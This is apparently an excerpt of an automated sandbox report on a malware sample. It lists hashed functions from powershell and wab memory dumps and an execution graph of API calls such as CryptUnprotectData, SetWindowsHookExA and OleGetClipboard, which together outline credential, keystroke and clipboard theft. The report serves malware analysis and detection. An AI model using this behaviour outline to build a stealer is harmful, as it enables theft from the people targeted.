                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e072f38c06ffb20d9f1ea1006d175c02489be1d58e1db7fcb6d3c0e8cb3b8b38
                                                                                    • Instruction ID: 8d7341e39f27086c8380e4a29f542ecf2880db6995e0c340359aef379211fd4a
                                                                                    • Opcode Fuzzy Hash: e072f38c06ffb20d9f1ea1006d175c02489be1d58e1db7fcb6d3c0e8cb3b8b38
                                                                                    • Instruction Fuzzy Hash: 93F03735902129DFDB169FE4D919AADBFB2FB98305F200019F503EA256DBB40816DF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E5FB8 Relevance: .0, Instructions: 32COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5fb654f1ecc990cd6e82dc2e519cceb1ee85ac2e925aa73374939c95d393b8e1
                                                                                    • Instruction ID: 61c3ccc4fb15b1c11a45bd992b383b0e976d58db9d82820f92dd46f3843ac320
                                                                                    • Opcode Fuzzy Hash: 5fb654f1ecc990cd6e82dc2e519cceb1ee85ac2e925aa73374939c95d393b8e1
                                                                                    • Instruction Fuzzy Hash: 69F03734901219DFDB259FE5D919AAEBFB1FB98305F204019F503EB245DBB40851CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E5DF3 Relevance: .0, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b31c5d1229d42ffd3c606b2abf3da1e5b2e0ba888caa8f54120559c0e6775ddb
                                                                                    • Instruction ID: c9c5ac4296d7ed67680b10db9c0e5e5105db0f56d1205b7ae462bd70ca76df60
                                                                                    • Opcode Fuzzy Hash: b31c5d1229d42ffd3c606b2abf3da1e5b2e0ba888caa8f54120559c0e6775ddb
                                                                                    • Instruction Fuzzy Hash: 0CF06735902219DFDB169FE4D92AAAEBFB2FBA8305F200419F503EB255DBB44C15DB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E5DB0 Relevance: .0, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 01a8664bc07bc9adfc0382a975e0b47c302eb30a910c594a333c89504830a9cc
                                                                                    • Instruction ID: a2e381081d8cd3d7e1726832feb88ac081676443a7ff51d46c9929ea76a045b3
                                                                                    • Opcode Fuzzy Hash: 01a8664bc07bc9adfc0382a975e0b47c302eb30a910c594a333c89504830a9cc
                                                                                    • Instruction Fuzzy Hash: 1CF09A34901219DFDB15DFE0D92AAAEBF72FB98305F200418F503EB245DBB44845CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E6003 Relevance: .0, Instructions: 25COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 34487acb51b35bccffa15103f78dd26015e002d5d6ed91d65a394f5878d60291
                                                                                    • Instruction ID: 67a4cc1e2e42edb3adb76dc840c66b8380097c395cf5d7e10fb3277f43e42e20
                                                                                    • Opcode Fuzzy Hash: 34487acb51b35bccffa15103f78dd26015e002d5d6ed91d65a394f5878d60291
                                                                                    • Instruction Fuzzy Hash: FAF0A030641119DFDB05DBD0D919AAE7B71FBA4305F200408F503AB285DB780946CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E611D Relevance: .0, Instructions: 25COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1e50bcf4955211f3916658d3cfc0dade81c33200bca4328b0a0538c8008ec838
                                                                                    • Instruction ID: 28461fb49ef8d978a9b366f58b410a5ec74a93d67907faa9fae4204fc2fa2423
                                                                                    • Opcode Fuzzy Hash: 1e50bcf4955211f3916658d3cfc0dade81c33200bca4328b0a0538c8008ec838
                                                                                    • Instruction Fuzzy Hash: 64F0A030641119DFDB05DBD0D959AAE7B71FBA4305F204408F503AA245CB780906CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 07A160BC Relevance: .0, Instructions: 25COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2682278295.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7a10000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2989119d81a02f9245695cf896633ffcbc458ff8967d10cf8ad10a4f9581133b
                                                                                    • Instruction ID: 7563c5576492d6924faaf7e3da1b2a7f9e1f59b6c594cc27ba5c75069f9d053f
                                                                                    • Opcode Fuzzy Hash: 2989119d81a02f9245695cf896633ffcbc458ff8967d10cf8ad10a4f9581133b
                                                                                    • Instruction Fuzzy Hash: 6AF03974605252CFEB11CF14C980A11BBB1EBC6709F19C0D6D428CF293CB76E846CB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E60F5 Relevance: .0, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0775fa117b22286fa3309a5d320ee60385a323e1f06d69a9ce603341388f3527
                                                                                    • Instruction ID: 6a7237e6645c6088f9a0e06123153dc7b719b64357b7e43e7f57753b557992f4
                                                                                    • Opcode Fuzzy Hash: 0775fa117b22286fa3309a5d320ee60385a323e1f06d69a9ce603341388f3527
                                                                                    • Instruction Fuzzy Hash: BAE0923054120EDFDB059BD4D959AAE7F35FBA4305F20041CF103AA246CFB44815DF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E6065 Relevance: .0, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 67cb440ef49944555fc125d32f0c7ed70faf7bde22312d861bdd219c387d5be1
                                                                                    • Instruction ID: 22fbd1cdb059c54c1b4a70bc5f38eeeada20d719a19da808d260993cfb411469
                                                                                    • Opcode Fuzzy Hash: 67cb440ef49944555fc125d32f0c7ed70faf7bde22312d861bdd219c387d5be1
                                                                                    • Instruction Fuzzy Hash: 81E0DF3058120EDFEB059FD0D96ABAE7F35FB64309F200808F103EA285CBB44815DB51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E608B Relevance: .0, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 67cb440ef49944555fc125d32f0c7ed70faf7bde22312d861bdd219c387d5be1
                                                                                    • Instruction ID: 22fbd1cdb059c54c1b4a70bc5f38eeeada20d719a19da808d260993cfb411469
                                                                                    • Opcode Fuzzy Hash: 67cb440ef49944555fc125d32f0c7ed70faf7bde22312d861bdd219c387d5be1
                                                                                    • Instruction Fuzzy Hash: 81E0DF3058120EDFEB059FD0D96ABAE7F35FB64309F200808F103EA285CBB44815DB51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 086E5DA4 Relevance: .0, Instructions: 13COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2684285689.00000000086E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_86e0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0e40e1ca014f7f8a6b80bac60c671c354f007962dc8123e868f2a29cee9b39ba
                                                                                    • Instruction ID: b9826f8cd2236c2110cac122724ed80fbaf3f667ee00fee192e438e079a998c8
                                                                                    • Opcode Fuzzy Hash: 0e40e1ca014f7f8a6b80bac60c671c354f007962dc8123e868f2a29cee9b39ba
                                                                                    • Instruction Fuzzy Hash: BCD0523059220FDAEB018A84C2297AE7AB0BB30209F310808E002B2281EBB40649CA92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Execution Graph

                                                                                    Execution Coverage:13%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:284
                                                                                    Total number of Limit Nodes:34
                                                                                    execution_graph 38553 24c86258 38554 24c862c0 CreateWindowExW 38553->38554 38556 24c8637c 38554->38556 38557 24c8b9f8 38558 24c8ba03 38557->38558 38559 24c8ba13 38558->38559 38561 24c8b468 38558->38561 38562 24c8ba48 OleInitialize 38561->38562 38563 24c8baac 38562->38563 38563->38559 38564 24c89fb8 DuplicateHandle 38565 24c8a04e 38564->38565 38566 27c0848 38568 27c084e 38566->38568 38567 27c091b 38568->38567 38570 27c1382 38568->38570 38571 27c137a 38570->38571 38572 27c137c 38571->38572 38578 24c831c0 38571->38578 38584 24c831b0 38571->38584 38590 27c7d40 38571->38590 38595 27c7d98 38571->38595 38600 27c7eb0 38571->38600 38572->38568 38579 24c831d2 38578->38579 38582 24c83283 38579->38582 38608 24c81144 38579->38608 38581 24c83249 38613 24c81164 38581->38613 38582->38571 38585 24c831d2 38584->38585 38586 24c81144 2 API calls 38585->38586 38587 24c83283 38585->38587 38588 24c83249 38586->38588 38587->38571 38589 24c81164 KiUserCallbackDispatcher 38588->38589 38589->38587 38591 27c7dae 38590->38591 38592 27c7f1a 38591->38592 38665 27cf407 38591->38665 38670 27cf263 38591->38670 38592->38571 38597 27c7dae 38595->38597 38596 27c7f1a 38596->38571 38597->38596 38598 27cf407 3 API calls 38597->38598 38599 27cf263 CryptUnprotectData 38597->38599 38598->38596 38599->38596 38601 27c7eba 38600->38601 38602 27c7ed4 38601->38602 38604 24cafa90 3 API calls 38601->38604 38605 24cafa81 3 API calls 38601->38605 38603 27c7f1a 38602->38603 38606 27cf407 3 API calls 38602->38606 38607 27cf263 CryptUnprotectData 38602->38607 38603->38571 38604->38602 38605->38602 38606->38603 38607->38603 38609 24c8114f 38608->38609 38617 24c84780 38609->38617 38626 24c84770 38609->38626 38610 24c8382a 38610->38581 38614 24c8116f 38613->38614 38616 24c8b16b 38614->38616 38661 24c89bc4 38614->38661 38616->38582 38618 24c847ab 38617->38618 38635 24c8370c 38618->38635 38621 24c8482e 38623 24c8485a 38621->38623 38644 24c8371c 38621->38644 38624 24c8370c 2 API calls 38624->38621 38627 24c847ab 38626->38627 38628 24c8370c 2 API calls 38627->38628 38629 24c84812 38628->38629 38633 24c8370c 2 API calls 38629->38633 38634 24c84c50 2 API calls 38629->38634 38630 24c8482e 38631 24c8371c GetModuleHandleW 38630->38631 38632 24c8485a 38630->38632 38631->38632 38633->38630 38634->38630 38636 24c83717 38635->38636 38637 24c84812 38636->38637 38648 24c84e6b 38636->38648 38637->38624 38639 24c84c50 38637->38639 38640 24c84c6b 38639->38640 38641 24c84c6f 38639->38641 38640->38621 38642 24c84dae 38641->38642 38643 24c84e6b 2 API calls 38641->38643 38643->38642 38645 24c851b0 GetModuleHandleW 38644->38645 38647 24c85225 38645->38647 38647->38623 38649 24c84e85 38648->38649 38650 24c8371c GetModuleHandleW 38649->38650 38651 24c84ea9 38649->38651 38650->38651 38652 24c8371c GetModuleHandleW 38651->38652 38660 24c85074 38651->38660 38654 24c84ffa 38652->38654 38653 24c850cf 38653->38637 38654->38653 38657 24c8371c GetModuleHandleW 38654->38657 38654->38660 38655 24c851f8 GetModuleHandleW 38656 24c85225 38655->38656 38656->38637 38658 24c85048 38657->38658 38659 24c8371c GetModuleHandleW 38658->38659 38658->38660 38659->38660 38660->38653 38660->38655 38662 24c8b180 KiUserCallbackDispatcher 38661->38662 38664 24c8b1ee 38662->38664 38664->38614 38666 27cf412 38665->38666 38675 24cafa90 38666->38675 38680 24cafa81 38666->38680 38667 27cf419 38667->38592 38671 27cf281 38670->38671 38672 27cf2f7 38671->38672 38685 27cf498 38671->38685 38692 27cf48b 38671->38692 38676 24cafaa5 38675->38676 38677 24cafcba 38676->38677 38678 24cafce0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 38676->38678 38679 24cafcd1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 38676->38679 38677->38667 38678->38676 38679->38676 38682 24cafaa5 38680->38682 38681 24cafcba 38681->38667 38682->38681 38683 24cafce0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 38682->38683 38684 24cafcd1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 38682->38684 38683->38682 38684->38682 38686 27cf49d 38685->38686 38687 27cf4cb 38686->38687 38699 27cf74e 38686->38699 38706 27cf4e3 38686->38706 38713 27cf4e8 38686->38713 38720 27cf6cf 38686->38720 38687->38671 38693 27cf498 38692->38693 38694 27cf4cb 38693->38694 38695 27cf74e CryptUnprotectData 38693->38695 38696 27cf6cf CryptUnprotectData 38693->38696 38697 27cf4e8 CryptUnprotectData 38693->38697 38698 27cf4e3 CryptUnprotectData 38693->38698 38694->38671 38695->38693 38696->38693 38697->38693 38698->38693 38701 27cf55e 38699->38701 38700 27cf77a 38701->38700 38702 27cf7b8 CryptUnprotectData 38701->38702 38703 27cf7b3 CryptUnprotectData 38701->38703 38727 27cfb98 38701->38727 38731 27cf961 38701->38731 38702->38701 38703->38701 38708 27cf4e8 38706->38708 38707 27cf77a 38708->38707 38709 27cf7b8 CryptUnprotectData 38708->38709 38710 27cfb98 CryptUnprotectData 38708->38710 38711 27cf961 CryptUnprotectData 38708->38711 38712 27cf7b3 CryptUnprotectData 38708->38712 38709->38708 38710->38708 38711->38708 38712->38708 38715 27cf4ff 38713->38715 38714 27cf77a 38715->38714 38716 27cf7b8 CryptUnprotectData 38715->38716 38717 27cfb98 CryptUnprotectData 38715->38717 38718 27cf961 CryptUnprotectData 38715->38718 38719 27cf7b3 CryptUnprotectData 38715->38719 38716->38715 38717->38715 38718->38715 38719->38715 38722 27cf55e 38720->38722 38721 27cf77a 38722->38721 38723 27cf7b8 CryptUnprotectData 38722->38723 38724 27cfb98 CryptUnprotectData 38722->38724 38725 27cf961 CryptUnprotectData 38722->38725 38726 27cf7b3 CryptUnprotectData 38722->38726 38723->38722 38724->38722 38725->38722 38726->38722 38729 27cf994 38727->38729 38728 27cfbd9 38728->38701 38729->38728 38735 27cfe48 38729->38735 38733 27cf994 38731->38733 38732 27cfbd9 38732->38701 38733->38732 38734 27cfe48 CryptUnprotectData 38733->38734 38734->38733 38736 27cfe5c 38735->38736 38737 27cfea8 38735->38737 38741 27cff18 38736->38741 38746 27cff0b 38736->38746 38737->38729 38738 27cfe97 38738->38729 38742 27cff2f 38741->38742 38751 24c80580 38742->38751 38756 24c80570 38742->38756 38743 27cff46 38743->38738 38747 27cff18 38746->38747 38749 24c80580 CryptUnprotectData 38747->38749 38750 24c80570 CryptUnprotectData 38747->38750 38748 27cff46 38748->38738 38749->38748 38750->38748 38752 24c805a5 38751->38752 38753 24c80659 38751->38753 38752->38753 38761 24c807cb 38752->38761 38765 24c807d0 38752->38765 38753->38743 38757 24c805a5 38756->38757 38758 24c80659 38756->38758 38757->38758 38759 24c807cb CryptUnprotectData 38757->38759 38760 24c807d0 CryptUnprotectData 38757->38760 38758->38743 38759->38758 38760->38758 38762 24c807ed 38761->38762 38763 24c803e0 CryptUnprotectData 38762->38763 38764 24c80825 38763->38764 38764->38753 38766 24c807ed 38765->38766 38767 24c803e0 CryptUnprotectData 38766->38767 38768 24c80825 38767->38768 38768->38753 38769 24c8d6d0 38770 24c8d714 SetWindowsHookExA 38769->38770 38772 24c8d75a 38770->38772 38773 24c89d70 38774 24c89db6 GetCurrentProcess 38773->38774 38776 24c89e08 GetCurrentThread 38774->38776 38777 24c89e01 38774->38777 38778 24c89e45 GetCurrentProcess 38776->38778 38779 24c89e3e 38776->38779 38777->38776 38782 24c89e7b 38778->38782 38779->38778 38780 24c89ea3 GetCurrentThreadId 38781 24c89ed4 38780->38781 38782->38780 38783 279d044 38784 279d05c 38783->38784 38785 279d0b6 38784->38785 38791 24c863ff 38784->38791 38797 24c844f4 38784->38797 38801 24c84504 38784->38801 38809 24c8ab91 38784->38809 38817 24c86410 38784->38817 38792 24c86436 38791->38792 38793 24c844f4 2 API calls 38792->38793 38794 24c86442 38793->38794 38795 24c84504 2 API calls 38794->38795 38796 24c86457 38795->38796 38796->38785 38798 24c844ff 38797->38798 38823 24c8452c 38798->38823 38800 24c86547 38800->38785 38802 24c8450f 38801->38802 38803 24c8ac21 38802->38803 38805 24c8ac11 38802->38805 38806 24c8ac1f 38803->38806 38841 24c89b6c 38803->38841 38829 24c8ad48 38805->38829 38835 24c8ad38 38805->38835 38812 24c8abed 38809->38812 38810 24c8ac21 38811 24c89b6c 2 API calls 38810->38811 38814 24c8ac1f 38810->38814 38811->38814 38812->38810 38813 24c8ac11 38812->38813 38815 24c8ad48 2 API calls 38813->38815 38816 24c8ad38 2 API calls 38813->38816 38815->38814 38816->38814 38818 24c86436 38817->38818 38819 24c844f4 2 API calls 38818->38819 38820 24c86442 38819->38820 38821 24c84504 2 API calls 38820->38821 38822 24c86457 38821->38822 38822->38785 38824 24c84537 38823->38824 38825 24c8370c 2 API calls 38824->38825 38826 24c865a9 38825->38826 38827 24c8371c GetModuleHandleW 38826->38827 38828 24c86617 38826->38828 38827->38828 38831 24c8ad56 38829->38831 38830 24c89b6c 2 API calls 38830->38831 38831->38830 38832 24c8ae2e 38831->38832 38848 24c8b210 38831->38848 38852 24c8b220 38831->38852 38832->38806 38836 24c8ad56 38835->38836 38837 24c89b6c 2 API calls 38836->38837 38838 24c8ae2e 38836->38838 38839 24c8b210 OleGetClipboard 38836->38839 38840 24c8b220 OleGetClipboard 38836->38840 38837->38836 38838->38806 38839->38836 38840->38836 38842 24c89b77 38841->38842 38843 24c8ae8a 38842->38843 38844 24c8af34 38842->38844 38845 24c8aee2 CallWindowProcW 38843->38845 38847 24c8ae91 38843->38847 38846 24c84504 OleGetClipboard 38844->38846 38845->38847 38846->38847 38847->38806 38849 24c8b23f 38848->38849 38850 24c8b305 38849->38850 38856 24c8b7d8 38849->38856 38850->38831 38853 24c8b23f 38852->38853 38854 24c8b305 38853->38854 38855 24c8b7d8 OleGetClipboard 38853->38855 38854->38831 38855->38853 38857 24c8b7e0 38856->38857 38858 24c8b7f4 38857->38858 38862 24c8b820 38857->38862 38873 24c8b811 38857->38873 38858->38849 38859 24c8b809 38859->38849 38863 24c8b832 38862->38863 38864 24c8b84d 38863->38864 38866 24c8b891 38863->38866 38869 24c8b820 OleGetClipboard 38864->38869 38870 24c8b811 OleGetClipboard 38864->38870 38865 24c8b853 38865->38859 38868 24c8b911 38866->38868 38884 24c8bad8 38866->38884 38888 24c8bae8 38866->38888 38867 24c8b92f 38867->38859 38868->38859 38869->38865 38870->38865 38874 24c8b832 38873->38874 38875 24c8b84d 38874->38875 38877 24c8b891 38874->38877 38880 24c8b820 OleGetClipboard 38875->38880 38881 24c8b811 OleGetClipboard 38875->38881 38876 24c8b853 38876->38859 38879 24c8b911 38877->38879 38882 24c8bad8 OleGetClipboard 38877->38882 38883 24c8bae8 OleGetClipboard 38877->38883 38878 24c8b92f 38878->38859 38879->38859 38880->38876 38881->38876 38882->38878 38883->38878 38886 24c8bafd 38884->38886 38887 24c8bb23 38886->38887 38892 24c8b580 38886->38892 38887->38867 38890 24c8bafd 38888->38890 38889 24c8b580 OleGetClipboard 38889->38890 38890->38889 38891 24c8bb23 38890->38891 38891->38867 38893 24c8bb90 OleGetClipboard 38892->38893 38895 24c8bc2a 38893->38895

                                                                                    Executed Functions

                                                                                    Function 24CA2388 Relevance: 4.0, Strings: 2, Instructions: 1496COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ,F^$$F^$
                                                                                    • API String ID: 0-2118841712
                                                                                    • Opcode ID: 5336b52ca68b093a49fd63cbec837a27b83ee1ff90bb43e1eb4b7c31a6f6a7c6
                                                                                    • Instruction ID: 708ebd4083d523209c4cdae1027b00b4da9316b9ecb4a858cb7a0b782287c152
                                                                                    • Opcode Fuzzy Hash: 5336b52ca68b093a49fd63cbec837a27b83ee1ff90bb43e1eb4b7c31a6f6a7c6
                                                                                    • Instruction Fuzzy Hash: A2D25C30A00226CFDB15DF68C494A9DB7B2FF85314F6089AAD449AB365DB74ED85CF80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CAB288 Relevance: 3.3, Strings: 2, Instructions: 772COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (\^$$(\^$
                                                                                    • API String ID: 0-505694876
                                                                                    • Opcode ID: ce9743af03635d35a70b32016f8d656625e3f94c657a85100d2899ed9e2c4f1c
                                                                                    • Instruction ID: f6591b96c43649a81cf0054c2e286c2fb266084b1e4ab7cc5211ecca2e4a87b3
                                                                                    • Opcode Fuzzy Hash: ce9743af03635d35a70b32016f8d656625e3f94c657a85100d2899ed9e2c4f1c
                                                                                    • Instruction Fuzzy Hash: 10525070E0021A8BDB15DFACD49079DBBB3FB85310F20492AE605EB356EA74DD818B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA7DC8 Relevance: 1.7, Strings: 1, Instructions: 476COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DR^$
                                                                                    • API String ID: 0-1110539939
                                                                                    • Opcode ID: f76a5640658c31ea9788496889388b78996804c60e24d5090b3f488f63fa2a9d
                                                                                    • Instruction ID: c2d6c61db869422ae05a8644105c39b33d3a0798b9a343540888b7c26c934314
                                                                                    • Opcode Fuzzy Hash: f76a5640658c31ea9788496889388b78996804c60e24d5090b3f488f63fa2a9d
                                                                                    • Instruction Fuzzy Hash: 0C028E30B012268FDB05DF68D894A9EB7F3FF84310F148969D905AB395DB75ED428BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24C803E0 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 24C80A75
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 834300711-0
                                                                                    • Opcode ID: 50fa6e90806a9247c4f0a669ecd59a83a1dde1f94fd0eadf5a3a202d0a31a3cf
                                                                                    • Instruction ID: b4176f783a56666532b53f33e9d4a82555254221b240c5dbe22c647c03799cce
                                                                                    • Opcode Fuzzy Hash: 50fa6e90806a9247c4f0a669ecd59a83a1dde1f94fd0eadf5a3a202d0a31a3cf
                                                                                    • Instruction Fuzzy Hash: 0C1144B2800249DFCB11CF9AC941BEEBFF5EF48320F108429E614A7210C379A950CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24C80A0B Relevance: 1.6, APIs: 1, Instructions: 54encryptionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 24C80A75
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629056563.0000000024C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 24C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24c80000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 834300711-0
                                                                                    • Opcode ID: 1f5505d673167c44b79e79375dec595d6af480818e859c790871f92b205c7c3b
                                                                                    • Instruction ID: 4215e1c6e01049e01c4bcae28d35ee3fffee00cb794154f634568923ca9cca65
                                                                                    • Opcode Fuzzy Hash: 1f5505d673167c44b79e79375dec595d6af480818e859c790871f92b205c7c3b
                                                                                    • Instruction Fuzzy Hash: 371134B2800249DFDB11CF9AD941BDEBFF4EF58320F108419E628A7210D379A655CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 24CA6630 Relevance: .8, Instructions: 814COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.3629153780.0000000024CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 24CA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_24ca0000_wab.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 833c9a55bb009b85565161dcfff491941557b3ce3e308b07d1844ca08e7ffffb
                                                                                    • Instruction ID: 6b002b9adcd8cd57de314b9733e7eaee76989be083dbaf1e3225da0f6e666fd3
                                                                                    • Opcode Fuzzy Hash: 833c9a55bb009b85565161dcfff491941557b3ce3e308b07d1844ca08e7ffffb
                                                                                    • Instruction Fuzzy Hash: D5625C34B002168FDB05EF68C594A9DB7B3EF88714F148869E846EB395DB75ED42CB80
                                                                                    Uniqueness

